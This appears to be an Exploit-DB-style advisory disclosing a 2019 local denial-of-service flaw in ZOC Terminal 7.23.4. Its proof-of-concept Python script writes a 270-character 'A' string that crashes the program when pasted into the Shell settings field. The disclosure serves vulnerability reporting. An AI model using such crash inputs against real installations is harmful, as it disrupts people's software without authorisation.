Vendor: ZOC Terminal
By: Victor Mondragón
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: ZOC Terminal
Affected Version From: 7.23.4
Affected Version To: 7.23.4
Patch Exists: NO
Related CWE: N/A
CPE: a:emtec:zoc_terminal:7.23.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
Year: 2019

ZOC Terminal v7.23.4 – ‘Shell’ Denial of Service (PoC)

ZOC Terminal v7.23.4 is vulnerable to a denial of service through the 'Shell' field of the Program Settings menu. The proof of concept runs a Python script to generate a text file, pastes that file's content into the 'Shell' field, saves the setting, and then selects the 'Command Shell' option in the View menu, at which point the application crashes.

Mitigation:

Users should avoid pasting untrusted content into the 'Shell' field of the Program Settings menu.
Exploit-DB raw data:

#Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_sh.py
#2.- Open zoc_sh.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select Options > Program Settings... > Special Files
#5.- Select the "Shell" field, erase the content and paste the clipboard
#6.- Click on "Save"
#7.- Select View > "Command Shell" and select "ok"
#8.- Crashed

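# Build the 270-character string of "A" (0x41) used in the steps above
cod = "\x41" * 270

# Write it to zoc_sh.txt; the context manager closes the file
with open('zoc_sh.txt', 'w') as f:
    f.write(cod)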